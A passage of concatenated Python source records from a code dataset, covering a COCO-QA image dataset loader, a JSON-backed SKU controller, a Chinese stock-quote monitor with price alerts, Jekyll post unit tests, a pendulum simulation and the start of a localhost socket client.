img_prefix,\n collate=False,\n enc_idx=None,\n q2i=None,\n a2i=None,\n i2a=None):\n\n self.image_enc_dir = image_enc_dir\n self.image_names = image_names\n self.ques_ids = np.load(question_id_file, allow_pickle=True)\n self.answers = [s.strip() for s in open(answer_text_file, \"r\").readlines()]\n self.enc_idx = enc_idx\n self.q2i = q2i\n self.a2i = a2i\n self.i2a = i2a\n self.collate = collate\n\n self.q2i_len = len(self.q2i)\n self.a2i_len = len(self.a2i.keys())\n self.q2i_keys = self.q2i.keys()\n\n self.img_ids = []\n for fname in self.image_names:\n img_id = fname.split('.')[0].rpartition(img_prefix)[-1]\n self.img_ids.append(int(img_id))\n\n def __len__(self):\n return len(self.ques_ids)\n\n def __getitem__(self, idx):\n\n img_id = self.img_ids[idx]\n file_idx = self.enc_idx[img_id]\n path = self.image_enc_dir + '/' + str(file_idx) + '.npz'\n img = np.load(path)['out'] # 512 x 196\n imgT = torch.from_numpy(img).float()\n\n ques_id = self.ques_ids[idx]\n quesT = torch.from_numpy(np.array(ques_id)).long()\n answer = self.answers[idx]\n\n if answer == \"\":\n gT = torch.from_numpy(np.array([len(self.a2i)])).long()\n else:\n gT = torch.from_numpy(np.array([self.a2i[answer]])).long()\n\n if not self.collate:\n return {'img' : imgT, 'ques' : quesT, 'gt': gT}\n\n return imgT, quesT, gT\n\n\nclass CocoQADataset(Dataset):\n\n def __init__(self,\n image_dir,\n question_id_file,\n image_names,\n answer_text_file,\n collate=False,\n q2i=None,\n a2i=None,\n i2a=None,\n method=\"simple\"):\n \"\"\"\n Args:\n image_dir (string): Path to the directory with COCO images\n question_id_file (string): Path to the npy file containing the question id array\n image_names_file (string): Path to the npy file containing image name array\n answer_text_file (string): Path to the text file containing answertext\n\n \"\"\"\n\n print(method)\n self.image_dir = image_dir\n self.ques_ids = np.load(question_id_file, allow_pickle=True)\n #self.image_names = np.load(image_names_file, allow_pickle=True)\n self.image_names = image_names\n self.answers = [s.strip() for s in open(answer_text_file, \"r\").readlines()]\n self.q2i = q2i\n self.a2i = a2i\n self.i2a = i2a\n self.method = method\n self.collate = collate\n\n self.transform = transforms.Compose([transforms.Resize((224, 224)),\n transforms.ToTensor()])\n\n self.q2i_len = len(self.q2i)\n self.a2i_len = len(self.a2i.keys())\n self.q2i_keys = self.q2i.keys()\n\n\n def __len__(self):\n return len(self.ques_ids)\n\n def __getitem__(self, idx):\n img = default_loader(self.image_dir + '/' + self.image_names[idx])\n #imgT = self.transform(img).permute(1, 2, 0)\n imgT = self.transform(img).float()\n\n ques_id = self.ques_ids[idx]\n quesT = torch.from_numpy(np.array(ques_id)).long()\n answer = self.answers[idx]\n\n if answer == \"\":\n gT = torch.from_numpy(np.array([len(self.a2i)])).long()\n else:\n gT = torch.from_numpy(np.array([self.a2i[answer]])).long()\n\n if not self.collate:\n return {'img' : imgT, 'ques' : quesT, 'gt': gT}\n\n return imgT, quesT, gT\n","sub_path":"coatt/cocoqa_dataset.py","file_name":"cocoqa_dataset.py","file_ext":"py","file_size_in_byte":4637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"648420987","text":"import json\n\ncaminho = 'C:/Users/matheus.bertho/Desktop/Filosofo Piton/AutParts/GeradorDeAnuncios/skuControl/datas/' \\\n 'jsonSAP.json'\n\n\nclass SkuSimpleController:\n # pedir para entrar com caminho para o json\n def __init__(self, test=False):\n self._test = test\n self._caminho = caminho if test else caminho\n self._dicionarioJson = self.__openJson()\n\n def getDicionario(self):\n return self._dicionarioJson\n\n def getIdList(self):\n listID = []\n for x in self._dicionarioJson:\n listID.append(x['id'])\n return listID\n\n def __openJson(self):\n try:\n config = json.loads(open(self._caminho, encoding=\"utf8\").read())\n except FileNotFoundError:\n exit(\"Arquivo \" + self._caminho + \" Não encontrado\")\n return config\n\n def setJsonPlusOne(self, sap):\n for di in self._dicionarioJson:\n if di['id'] == sap:\n di['data']['value'] += 1\n\n with open(self._caminho, \"w\", encoding='utf8') as jsonFile:\n json.dump(self._dicionarioJson, jsonFile, ensure_ascii=False)\n\n def getName(self, sku):\n\n with open(self._caminho, \"r\", encoding='utf-8') as lerJson:\n arqJsonLeitura = json.load(lerJson)\n\n sap = sku.split('-')[0]\n for itemJson in arqJsonLeitura:\n \"\"\"\n caso identificar que tem algum ja criado adicionar outro\n \"\"\"\n if sap == itemJson['id']:\n return itemJson['data']['category_name']\n exit('produto nao encontrado getName')\n\n def createNewSkuSimple(self, sap, marca='', nome='', qnt=0):\n\n sapTratado = self.validateSap(sap)\n\n with open(self._caminho, \"r\", encoding='utf-8') as lerJson:\n arqJsonLeitura = json.load(lerJson)\n self.getListaComIds(arqJsonLeitura)\n\n for itemJson in arqJsonLeitura:\n \"\"\"\n caso identificar que tem algum ja criado adicionar outro\n \"\"\"\n if sapTratado == itemJson['id']:\n # verificar se vai parar aqui mesmo\n # exit(f'duplicado? {itemJson[\"id\"]}')\n if self._test:\n return self.SKU(sapTratado, str(itemJson[\"data\"][\"value\"] + 1))\n else:\n self.setJsonPlusOne(itemJson['id'])\n return str(self.SKU(sapTratado, itemJson['data']['value'])) # adiciona um no value\n\n campoSap = self.createNewDataSap(marca, nome, qty_package=qnt)\n\n novoSku = {\n \"id\": sapTratado,\n \"data\": campoSap\n }\n self._dicionarioJson.append(novoSku)\n\n with open(self._caminho, \"w\", encoding='utf8') as jsonFile:\n json.dump(self._dicionarioJson, jsonFile, indent=4, ensure_ascii=False)\n\n sku = self.SKU(sapTratado, campoSap['value'])\n\n return sku\n\n def getListaComIds(self, arqJsonLeitura):\n listaIds = []\n for eachJsonFileSimple in arqJsonLeitura:\n listaIds.append(eachJsonFileSimple['id'])\n\n def SKU(self, sapTratado, value):\n return str(sapTratado) + '-' + str((4 - len(str(value))) * '0') + str(value)\n\n def validateSap(self, sap):\n sapTratado = sap.upper().replace(' ', '')\n if len(sapTratado) != 7 or 'AU' not in sapTratado:\n exit(f\"Nome do SAP {sap} não permitido\")\n return sapTratado\n\n def createNewDataSap(self, marca, nome, qty_package=1):\n return {'value': 0, \"category_name\": nome, \"qty_package\": qty_package, \"brand\": marca}\n\n\n# j = SkuSimpleController()\n# j.createNewSkuSimple('aucb003', \"Bosch\")\n","sub_path":"ControleSapSku/bkp_temporario/SkuSimpleController.py","file_name":"SkuSimpleController.py","file_ext":"py","file_size_in_byte":3631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"53906384","text":"#!/usr/bin/env python\nimport easyquotation\nimport time\nimport easyutils\nimport yarl\nimport sys\n\nfrom stock_get_history_data import *\n\nfrom statistics import mean\n\nfrom send_email import send_email\n\nDEBUG = True\ndef send_info(*args):\n if(DEBUG):\n print(*args)\n else :\n send_email(*args)\n\nMONITOR_POTENTIAL = False\n\nclass stock_monitor(stock_history_data) :\n def __init__(self, info_src, watch_stocks_dict):\n \n self.stock_list = []\n self.quotation = easyquotation.use(info_src) # 新浪 ['sina'] 腾讯 ['tencent', 'qq'] \n self.watch_stocks_info = watch_stocks_dict.copy()\n self.watch_stocks_list = [ key for key in watch_stocks_dict]\n \n ###############\n self.stock_dict,self.stock_list,self.stock_prefix_list = get_stock_code_name()\n# self.stock_list.remove('150129')\n self.already_informed_stocks = []\n\n self.first_time = 1\n self.stock_info_store = {}\n self.surged_limits = {}\n self.decline_limits = {}\n self.deal_time_store = []\n #上证指数 深圳成指 沪深300指数 上证50 中小板 创业板\n #index_list = {'sh': 'sh000001', 'sz': 'sz399001', 'hs300': 'sh000300',\n # 'sz50': 'sh000016', 'zxb': 'sz399005', 'cyb': 'sz399006', 'zx300': 'sz399008', 'zh500':'sh000905'}\n self.index_list = ['sh000001', 'sz399001', 'sh000300', 'sh000016','sz399005','sz399006']\n self.index_data_store = {}\n self.watch_stock_data_store = {}\n\n def print_stock_data(self,stock_data):\n for stock_code in self.stock_list:\n print(stock_data[stock_code])\n def debug_print(self,header , content):\n print(header)\n print(\"------------------------------\")\n print(content)\n\n def check_special_cases(self,stock_data):\n for stock_code in stock_data:\n if( stock_data[stock_code]['ask_all_volume'] == 0.0 and \\\n stock_data[stock_code]['bid_all_volume'] == 0.0) :\n self.debug_print(\"停牌 !从列表移除 \", str(stock_data[stock_code]))\n self.stock_list.remove(stock_code)\n elif( stock_data[stock_code]['close'] == 0) :\n self.debug_print(\"停牌 !从列表移除 \", str(stock_data[stock_code]))\n self.stock_list.remove(stock_code)\n\n def preprocess_index_data(self, index_data):\n pass\n def preprocess_watch_stock_data_step2(self, watch_stock_data):\n pass\n\n \n\n def preprocess_stock_index_data(self, stock_data,index_data,\n watch_stock_data):\n self.preprocess_stock_data_step1(stock_data)\n self.check_special_cases(stock_data)\n self.preprocess_stock_data_step2(stock_data)\n self.preprocess_index_data(index_data)\n self.preprocess_watch_stock_data_step1(watch_stock_data)\n self.preprocess_watch_stock_data_step2(watch_stock_data)\n\n\n\n def preprocess_watch_stock_data_step1(self, watch_stock_data):\n for stock_code in watch_stock_data:\n\n watch_stock_data[stock_code]['bid_all_volume'] = \\\n watch_stock_data[stock_code]['bid1_volume'] + \\\n watch_stock_data[stock_code]['bid2_volume'] + \\\n watch_stock_data[stock_code]['bid3_volume'] + \\\n watch_stock_data[stock_code]['bid4_volume'] + \\\n watch_stock_data[stock_code]['bid5_volume'] \n\n watch_stock_data[stock_code]['ask_all_volume'] = \\\n watch_stock_data[stock_code]['ask1_volume'] + \\\n watch_stock_data[stock_code]['ask2_volume'] + \\\n watch_stock_data[stock_code]['ask3_volume'] + \\\n watch_stock_data[stock_code]['ask4_volume'] + \\\n watch_stock_data[stock_code]['ask5_volume'] \n\n# Pay attention, stock_data key may not equal to self.stock_list , because we\n# may failed to fetch some stocks info\n def preprocess_stock_data_step1(self, stock_data):\n for stock_code in stock_data:\n \n stock_data[stock_code]['bid_all_volume'] = \\\n stock_data[stock_code]['bid1_volume'] + \\\n stock_data[stock_code]['bid2_volume'] + \\\n stock_data[stock_code]['bid3_volume'] + \\\n stock_data[stock_code]['bid4_volume'] + \\\n stock_data[stock_code]['bid5_volume'] \n\n stock_data[stock_code]['ask_all_volume'] = \\\n stock_data[stock_code]['ask1_volume'] + \\\n stock_data[stock_code]['ask2_volume'] + \\\n stock_data[stock_code]['ask3_volume'] + \\\n stock_data[stock_code]['ask4_volume'] + \\\n stock_data[stock_code]['ask5_volume'] \n\n def preprocess_stock_data_step2(self, stock_data):\n pass\n '''\n for stock_code in self.stock_list[:]:\n if ( stock_data[stock_code]['close'] == 0) :\n# print(stock_data[stock_code])\n self.stock_list.remove(stock_code)\n '''\n def monitor_stock_price_range(self, stock_data):\n local_stock_in_high_range = {}\n local_stock_in_low_range = {}\n local_stock_in_high_range_and_fluct = {}\n for stock_code in stock_data:\n if((stock_data[stock_code]['now'] >= (0.9*stock_data[stock_code]['high']+\n 0.1*stock_data[stock_code]['low'])) and\n (stock_data[stock_code]['rate'] >= 3)):\n local_stock_in_high_range_and_fluct[stock_code]= \\\n stock_data[stock_code].copy()\n\n if(stock_data[stock_code]['now'] >= \\\n (0.9*stock_data[stock_code]['high']+\n 0.1*stock_data[stock_code]['low'])):\n local_stock_in_high_range[stock_code]= \\\n stock_data[stock_code].copy()\n\n if(stock_data[stock_code]['now'] >= \\\n (0.9*stock_data[stock_code]['low']+\n 0.1*stock_data[stock_code]['high'])):\n local_stock_in_low_range[stock_code]= \\\n stock_data[stock_code].copy()\n\n# for code in local_stock_in_high_range_and_fluct:\n# print('{}:{}'.format(code, local_stock_in_high_range_and_fluct[code]['name']),\\\n# end = ' ')\n\n print('Total in deal stock {}'.format(len(stock_data)))\n print('In high price range stock \\\n {}'.format(len(local_stock_in_high_range)))\n# for code in local_stock_in_high_range:\n# print('{} {}'.format(code,local_stock_in_high_range[code]['name']),\n# end = ' ')\n print('In low price range stock \\\n {}'.format(len(local_stock_in_low_range)))\n# for code in local_stock_in_low_range:\n# print('{} {}'.format(code,local_stock_in_low_range[code]['name']),\n# end = ' ')\n\n\n\n def monitor_surged_decline_limits(self, stock_data):\n local_surged_limits = {}\n local_decline_limits = {}\n\n for stock_code in stock_data:\n if (stock_data[stock_code]['ask_all_volume'] == 0) :\n# self.debug_print(\"涨停 !\" ,str(stock_data[stock_code]))\n local_surged_limits[stock_code] = stock_data[stock_code].copy()\n elif (stock_data[stock_code]['bid_all_volume'] == 0) :\n# self.debug_print(\"跌停 !\" ,str(stock_data[stock_code]))\n local_decline_limits[stock_code] = stock_data[stock_code].copy()\n\n print(\"surged limits is as follows \")\n for stock_code in local_surged_limits:\n print('{0} {1} 封单:{2}'.format(stock_code,\n local_surged_limits[stock_code]['name'],\n local_surged_limits[stock_code]['bid1_volume']))\n print('两市涨停 {0} , 两市跌停 {1}'.format(len(local_surged_limits),\n len(local_decline_limits)))\n# print(\"decline limits is as follows \")\n# print(local_decline_limits)\n\n new_surge_stock_codes = [key for key in local_surged_limits if key not\n in self.surged_limits]\n print(\"---------------------------------------\")\n print(\"新涨停股票\")\n for key in new_surge_stock_codes:\n print('{} {}'.format(key, local_surged_limits[key]['name']))\n out_surge_stock_codes = [ key for key in self.surged_limits if key not in\n local_surged_limits ]\n print(\"---------------------------------------\")\n print(\"打开涨停股票\")\n for key in out_surge_stock_codes:\n print('{} {}'.format(key, self.surged_limits[key]['name']))\n\n common_surge_stock_codes = [ key for key in local_surged_limits if key\n in self.surged_limits]\n print(\"---------------------------------------\")\n print(\"封单减少 可能打开涨停\")\n for key in common_surge_stock_codes :\n if( local_surged_limits[key]['bid1_volume'] <=\n self.surged_limits[key]['bid1_volume']*0.95):\n print(\"{0} {1} origin:{2} now:{3}\".format(key,local_surged_limits[key]['name'],self.surged_limits[key]['bid1_volume'],local_surged_limits[key]['bid1_volume']))\n print(\"------------------------------------------\")\n print(\"封单增加 涨停更稳\")\n for key in common_surge_stock_codes :\n if( local_surged_limits[key]['bid1_volume'] >=\n self.surged_limits[key]['bid1_volume']*1.05):\n print(\"{0} {1} origin:{2} now:{3}\".format(key,local_surged_limits[key]['name'],self.surged_limits[key]['bid1_volume'],local_surged_limits[key]['bid1_volume']))\n\n self.surged_limits = local_surged_limits.copy()\n# del self.surged_limits['002225']\n# self.surged_limits['600519'] = stock_data['600519']\n# self.surged_limits['600755']['bid1_volume'] = 30000\n# self.surged_limits['000036']['bid1_volume'] = 30000\n self.decline_limits = local_decline_limits.copy()\n\n\n def monitor_biding_and_fluctuation(self, stock_data):\n for stock_code in stock_data:\n '''\n if(stock_data[stock_code]['rate'] == \\\n self.stock_info_store[stock_code]['rate'] and \\\n stock_data[stock_code]['ask_all_volume'] == \\\n self.stock_info_store[stock_code]['ask_all_volume'] and \\\n stock_data[stock_code]['bid_all_volume'] == \\\n self.stock_info_store[stock_code]['bid_all_volume'] ):\n self.debug_print(\"收市状态? \", str(stock_data[stock_code]))\n return\n '''\n if(stock_code in self.stock_info_store):\n if ((stock_data[stock_code]['ask_all_volume'] == 0) or\n (stock_data[stock_code]['bid_all_volume'] == 0) or \n (self.stock_info_store[stock_code]['bid_all_volume'] == 0)):\n continue\n \n if(stock_data[stock_code]['bid_all_volume']/ \\\n stock_data[stock_code]['ask_all_volume'] >= 3) :\n pass\n # self.debug_print(\"Somebody is biding heavily on this stock \",\n # str(stock_data[stock_code]))\n if(stock_data[stock_code]['bid_all_volume'] / \\\n self.stock_info_store[stock_code]['bid_all_volume'] > 1.5):\n pass\n # self.debug_print(\"many more bids than 15s before\", \\\n # str(stock_data[stock_code]))\n if(stock_data[stock_code]['rate'] >= \\\n (self.stock_info_store[stock_code]['rate'] + 0.6) or \\\n stock_data[stock_code]['rate'] <= \\\n (self.stock_info_store[stock_code]['rate'] - 0.6) ) :\n pass\n # self.debug_print(\"Some stock have wide fluctuation \", \\\n # str(stock_data[stock_code])) \n\n def monitor_index(self, index_data):\n for index in index_data:\n if index in self.index_data_store:\n if (index_data[index]['change'] > 0):\n symbol_index_change = '\\u2197'\n elif (index_data[index]['change'] == 0):\n symbol_index_change = '\\u2192'\n else :\n symbol_index_change = '\\u2198'\n\n index_minus_last_time = round(index_data[index]['now'] -\n self.index_data_store[index]['now'],2)\n if (index_minus_last_time > 0) :\n symbol_minus_last = '\\u2197'\n elif( index_minus_last_time == 0):\n symbol_minus_last = '\\u2192'\n else:\n symbol_minus_last = '\\u2198'\n print('{0} {1} {2}% {3}{4} 与上一采集周期相比 {5}{6}'.format(index_data[index]['name'] ,\n index_data[index]['now'], index_data[index]['rate'],\n symbol_index_change,index_data[index]['change'],\n symbol_minus_last,index_minus_last_time))\n\n def monitor_watch_stock(self, watch_stock_data):\n for watch_stock in watch_stock_data:\n if (watch_stock_data[watch_stock]['change'] > 0):\n symbol_watch_stock_change = '\\u2197'\n elif (watch_stock_data[watch_stock]['change'] == 0):\n symbol_watch_stock_change = '\\u2192'\n else :\n symbol_watch_stock_change = '\\u2198'\n\n watch_stock_minus_last_time = round(\n watch_stock_data[watch_stock]['now'] -\n self.watch_stock_data_store[watch_stock]['now'],2)\n if (watch_stock_minus_last_time > 0) :\n symbol_minus_last = '\\u2197'\n elif( watch_stock_minus_last_time == 0):\n symbol_minus_last = '\\u2192'\n else:\n symbol_minus_last = '\\u2198'\n print('{0} {1} {2}% {3}{4} 与上一采集周期相比 {5}{6}'.format(watch_stock_data[watch_stock]['name'] ,\n watch_stock_data[watch_stock]['now'], watch_stock_data[watch_stock]['rate'],\n symbol_watch_stock_change,watch_stock_data[watch_stock]['change'],\n symbol_minus_last,watch_stock_minus_last_time))\n if(watch_stock_data[watch_stock]['now'] >=\n self.watch_stocks_info[watch_stock]['ceil_alarm_price']):\n print(\"Higher than ceil alarm price\")\n send_info('{}:{} Higher than ceil alarm \\\n price'.format(watch_stock_data[watch_stock]['name'],\n watch_stock_data[watch_stock]['now']),\n str(watch_stock_data[watch_stock]))\n elif(watch_stock_data[watch_stock]['now'] <=\n self.watch_stocks_info[watch_stock]['floor_alarm_price']):\n print(\"lower than floor alarm price\")\n send_info('{}:{} lower than floor alarm \\\n price'.format(watch_stock_data[watch_stock]['name'], watch_stock_data[watch_stock]['now']),str(watch_stock_data[watch_stock]))\n print('买一{0}: {1} | 买二{2}: {3} | 买三{4}: {5} | 买四{6}: {7} | 买五{8}: {9}'.format(watch_stock_data[watch_stock]['bid1'], \n int(watch_stock_data[watch_stock]['bid1_volume']),\n watch_stock_data[watch_stock]['bid2'], \n int(watch_stock_data[watch_stock]['bid2_volume']),\n watch_stock_data[watch_stock]['bid3'], \n int(watch_stock_data[watch_stock]['bid3_volume']),\n watch_stock_data[watch_stock]['bid4'], \n int(watch_stock_data[watch_stock]['bid4_volume']),\n watch_stock_data[watch_stock]['bid5'], \n int(watch_stock_data[watch_stock]['bid5_volume'])))\n\n print('卖一{0}: {1} | 卖二{2}: {3} | 卖三{4}: {5} | 卖四{6}: {7} | 卖五{8}: {9}'.format( watch_stock_data[watch_stock]['ask1'],\n int(watch_stock_data[watch_stock]['ask1_volume']),\n watch_stock_data[watch_stock]['ask2'], \n int(watch_stock_data[watch_stock]['ask2_volume']),\n watch_stock_data[watch_stock]['ask3'], \n int(watch_stock_data[watch_stock]['ask3_volume']),\n watch_stock_data[watch_stock]['ask4'], \n int(watch_stock_data[watch_stock]['ask4_volume']),\n watch_stock_data[watch_stock]['ask5'], \n int(watch_stock_data[watch_stock]['ask5_volume'])))\n# print(\"{}\".format(watch_stock_data[watch_stock]['recent_deals']))\n recent_deal_list = watch_stock_data[watch_stock]['recent_deals'].split('|')\n\n local_time_list = []\n print('时 间 成交价(元)\t成交量\t性质')\n for deal in recent_deal_list:\n deal_list = deal.split('/')\n if(deal_list[0] not in self.deal_time_store):\n# buy_or_sell = '\\033[91m买盘\\033[00m' if deal_list[3] == 'B' \\\n# else '\\033[92m卖盘\\033[00m'\n buy_or_sell = '买盘' if deal_list[3] == 'B' \\\n else '\\033[92m卖盘\\033[00m'\n\n print('{0}\t{1}\t{2}\t{3}'.format(deal_list[0],\n deal_list[1],deal_list[2], buy_or_sell))\n local_time_list.append(deal_list[0])\n self.deal_time_store = local_time_list.copy()\n \n\n \n def need_pay_attention(self, code , potential_stocks_dict,stock_data):\n last_daily_list = potential_stocks_dict[code][7]\n vol_list = [float(x[5]) for x in last_daily_list]\n avg_vol = mean(vol_list)\n# print('{} {} '.format(code, avg_vol))\n\n return bool(stock_data[code]['now'] >= 0.99*potential_stocks_dict[code][5] and \n stock_data[code]['deal_vol'] > 2*avg_vol)\n\n\n\n\n def monitor_potential_stocks(self,stock_data):\n tmp_stocks_dict = self.get_potential_stocks_from_file()\n potential_stocks_dict = { x[2:]:tmp_stocks_dict[x] for x in\\\n tmp_stocks_dict}\n for code in potential_stocks_dict :\n if code in stock_data:\n if (self.need_pay_attention(code\n ,potential_stocks_dict,stock_data)):\n print('{} {} have big turnover suddenly and is potential'.format(code,potential_stocks_dict[code][0]))\n if(code not in self.already_informed_stocks) :\n send_info('{} {} have big turnover suddenly and is potential'.format(code,potential_stocks_dict[code][0]))\n self.already_informed_stocks.append(code)\n\n def is_reach_highest(self, code , highest_stocks_dict,stock_data):\n# print('{} {} '.format(code, avg_vol))\n\n if (stock_data[code]['now'] >= 0.99*highest_stocks_dict[code][5] and stock_data[code]['deal_vol'] > 1.5*highest_stocks_dict[code][6]):\n return True\n else :\n return False\n\n \n def monitor_reach_n_days_highest_stocks(self,stock_data):\n tmp_stocks_dict = self.get_n_days_highest_price_from_file()\n highest_stocks_dict = { x[2:]:tmp_stocks_dict[x] for x in\\\n tmp_stocks_dict}\n for code in highest_stocks_dict :\n if code in stock_data:\n if (self.is_reach_highest(code\n ,highest_stocks_dict,stock_data)):\n print('Debug , {} {} is reach n days highest price'.format(code,highest_stocks_dict[code][0]))\n if(code not in self.already_informed_stocks) :\n send_info('Debug , {} {} is reach n days highest price'.format(code,highest_stocks_dict[code][0]))\n self.already_informed_stocks.append(code)\n \n\n\n \n \n\n \n\n\n \n\n\n def monitor_stock(self,stock_data,index_data,watch_stock_data) :\n self.monitor_biding_and_fluctuation(stock_data)\n print('+++++++++++++++++++++++++++++++++')\n #little usage ? the algorithm is wrong ?\n self.monitor_stock_price_range(stock_data)\n print('+++++++++++++++++++++++++++++++++')\n\n self.monitor_surged_decline_limits(stock_data)\n print('+++++++++++++++++++++++++++++++++')\n self.monitor_index(index_data)\n print('+++++++++++++++++++++++++++++++++')\n self.monitor_watch_stock(watch_stock_data)\n print('+++++++++++++++++++++++++++++++++')\n \n if (MONITOR_POTENTIAL) :\n self.monitor_potential_stocks(stock_data)\n print('+++++++++++++++++++++++++++++++++')\n self.monitor_reach_n_days_highest_stocks(stock_data)\n print('+++++++++++++++++++++++++++++++++')\n\n \n def stock_debug_func(self):\n print(self.stock_list)\n\n \n def save_info(self, stock_data, index_data, watch_stock_data):\n self.stock_info_store = stock_data.copy()\n self.index_data_store = index_data.copy()\n self.watch_stock_data_store = watch_stock_data.copy()\n \n \n def stock_main_func(self):\n #because stock list is too large , sometimes it will meet \n #Response payload is not completed error\n #so do some retry here\n for attempt in range(10):\n try:\n #stock codes get \n stock_data = self.quotation.stocks(self.stock_list)\n except:\n print(\"Attempt {}: Meet payload not completed error\".format(attempt))\n else:\n break\n else:\n print(\"Try too many times to get stock data, exit the program\")\n send_info(\"Your stock program terminated now because try too many \\\n times to fetch stock data\")\n sys.exit()\n\n #all index get\n index_data = self.quotation.stocks(self.index_list)\n\n watch_stock_data = self.quotation.stocks(self.watch_stocks_list)\n\n\n self.preprocess_stock_index_data(stock_data, index_data,\n watch_stock_data)\n if (self.first_time == 0) :\n print(\"not the first time calling\")\n# print(self.stock_list)\n self.monitor_stock(stock_data, index_data,watch_stock_data)\n else :\n print(\"the first time calling\")\n self.first_time = 0\n self.save_info(stock_data, index_data,watch_stock_data)\n\nif __name__ == \"__main__\":\n\n#### 更新股票代码\n easyquotation.update_stock_codes()\n watch_stocks = \\\n {\n '600970':{'ceil_alarm_price':11.1,'floor_alarm_price':10.9},\n '300059':{'ceil_alarm_price':16.5,'floor_alarm_price':16.0},\n '600999':{'ceil_alarm_price':20.70,'floor_alarm_price':20.0},\n '000425':{'ceil_alarm_price':4.95,'floor_alarm_price':4.83},\n }\n\n my_stock = stock_monitor('qq',watch_stocks)\n while 1:\n my_stock.stock_main_func()\n# my_stock.stock_debug_func()\n print(\"#############################################\");\n time.sleep(10)\n\n\n\n\n","sub_path":"stock_monitor_qq.py","file_name":"stock_monitor_qq.py","file_ext":"py","file_size_in_byte":23285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"134434122","text":"import os\nimport datetime\nimport unittest\nfrom Hyde import Hyde, DuplicatePostError\nfrom TestUtility import TestUtility\n\n\nclass JekyllPostTest(unittest.TestCase, Hyde):\n\t\"\"\"\n\tTests adding a post and ensures the file is created.\n\tThen cleans up the file and the directory.\n\t\"\"\"\n\tdef test_handle_add_draft_post(self):\n\t\tpost_title = 'a draft title'\n\t\tdraft_root = '_drafts/'\n\t\tpath = draft_root + 'posts/'\n\t\tHyde._handle_add_post(post_title, path)\n\t\tactual_title = TestUtility.build_jekyll_post_title('a-draft-title') + '.md'\n\t\tactual_file = path + actual_title\n\t\tself.assertTrue(os.path.exists(path))\n\t\tself.assertTrue(os.path.isfile(actual_file))\n\t\texpected_post_contents = JekyllPostTest.get_expected_post_contents(post_title)\n\t\tactual_post_contents = JekyllPostTest.get_actual_post_contents(actual_file)\n\t\tself.assertEqual(expected_post_contents, actual_post_contents)\n\t\tTestUtility.remove_file(actual_file)\n\t\tself.assertFalse(os.path.isfile(actual_file))\n\t\tTestUtility.remove_directory(path)\n\t\tTestUtility.remove_directory(draft_root)\n\t\tself.assertFalse(os.path.exists(path))\n\t\tself.assertFalse(os.path.exists(draft_root))\n\n\tdef test_handle_add_duplicate_draft_post(self):\n\t\tpost_title = 'a draft title'\n\t\tdraft_root = '_drafts/'\n\t\tpath = draft_root + '/posts/'\n\t\tHyde._handle_add_post(post_title, path)\n\t\tactual_title = TestUtility.build_jekyll_post_title('a-draft-title') + '.md'\n\t\tactual_file = path + actual_title\n\t\tself.assertTrue(os.path.exists(path))\n\t\tself.assertTrue(os.path.isfile(actual_file))\n\t\twith self.assertRaises(DuplicatePostError) as err:\n\t\t\tHyde._handle_add_post(post_title, path)\n\n\t\tself.assertEqual(\"The file \"+path+actual_title+\" already exists. Nothing Created.\", err.exception.msg)\n\t\tTestUtility.remove_file(actual_file)\n\t\tself.assertFalse(os.path.isfile(actual_file))\n\t\tTestUtility.remove_directory(path)\n\t\tTestUtility.remove_directory(draft_root)\n\t\tself.assertFalse(os.path.exists(path))\n\t\tself.assertFalse(os.path.exists(draft_root))\n\n\tdef test_create_jekyll_draft_post_title(self):\n\t\t\"\"\"\n\t\tTests the creation of Jekyll draft post title using the Jekyll format.\n\t\t\"\"\"\n\t\tactual_title = Hyde.create_jekyll_post_title('title for this unit test')\n\t\texpected_title = TestUtility.build_jekyll_post_title('title-for-this-unit-test')\n\t\tself.assertEquals(expected_title, actual_title)\n\n\t@staticmethod\n\tdef get_expected_post_contents(post_title):\n\t\t\"\"\"\n\t\tCreates a post template list for testing.\n\t\t@param post_title: the title of the post.\n\t\t@return: the expected post template list.\n\t\t\"\"\"\n\t\texpected_post = ['---\\n',\n\t\t\t'layout: post\\n',\n\t\t\t'title: ' + post_title + '\\n',\n\t\t\t'date: ' + str(datetime.date.today()) + '\\n',\n\t\t\t'---\\n']\n\n\t\treturn expected_post\n\n\t@staticmethod\n\tdef get_actual_post_contents(post_file):\n\t\t\"\"\"\n\t\tReads and returns the contents of a post file.\n\t\t@param post_file: the post file to read.\n\t\t@return: post file contents as a list of lines.\n\t\t\"\"\"\n\t\twith open(post_file) as post_file:\n\t\t\tactual_file = post_file.readlines()\n\n\t\treturn actual_file\n\nif __name__ == '__main__':# pragma: no cover\n\tunittest.main()\n","sub_path":"tests/JekyllDraftPostTests.py","file_name":"JekyllDraftPostTests.py","file_ext":"py","file_size_in_byte":3053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"170300643","text":"from numpy import *\n\ndt=0.01\ng=9.8\nL=1\ntheta=1\nomega=0\n\nwhile True: \n # Euler-Cromer-Aspel update\n theta=theta+omega*dt\n omega=omega-g/L*sin(theta)*dt\n \n # Animation\n x=sin(theta)\n y=-cos(theta)\n print (\"l3\",0,0,0,x,y,0)\n print (\"ct3\",0,x,y,0,0.05)\n print (\"F\")\n","sub_path":"pendulum-basic.py","file_name":"pendulum-basic.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"354672636","text":"import sys, socket, time, random, hashlib\n\n# log function that flushes stdout, to help with\n# buffering of stdout.\ndef log(s):\n print(time.time(), name + \": \" + s)\n sys.stdout.flush()\n\n# only port and client \"name\" are included on command-line; assume\n# 'localhost' for host.\nport = int(sys.argv[1])\nname = sys.argv[2]\n\n# we want a 'random' delay, but it has to be predictable, as well,\n# for grading purposes. So we seed the random number generator with\n# a hash of the name. (We could have just hand-picked a different delay\n# for each of the 10 clients, but then what if we decide to run it later\n# with 100 clients??\nm = hashlib.md5(name.encode())\ni = 0\nfor x in m.digest(): i += x\nrandom.seed(i)\ndelay = random.randint(2, 6)\n\n# The rest is just the GET protocol hard-coded, with some log\n# output so we know when the client goes through certain milestones.\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsock.connect((\"localhost\", port))\nready = sock.recv(1024)\n\nlog(\"READY (%d delay).\" % delay)\n\nsock.send(\"GET test.txt\".encode(\"UTF-8\"))\nok = 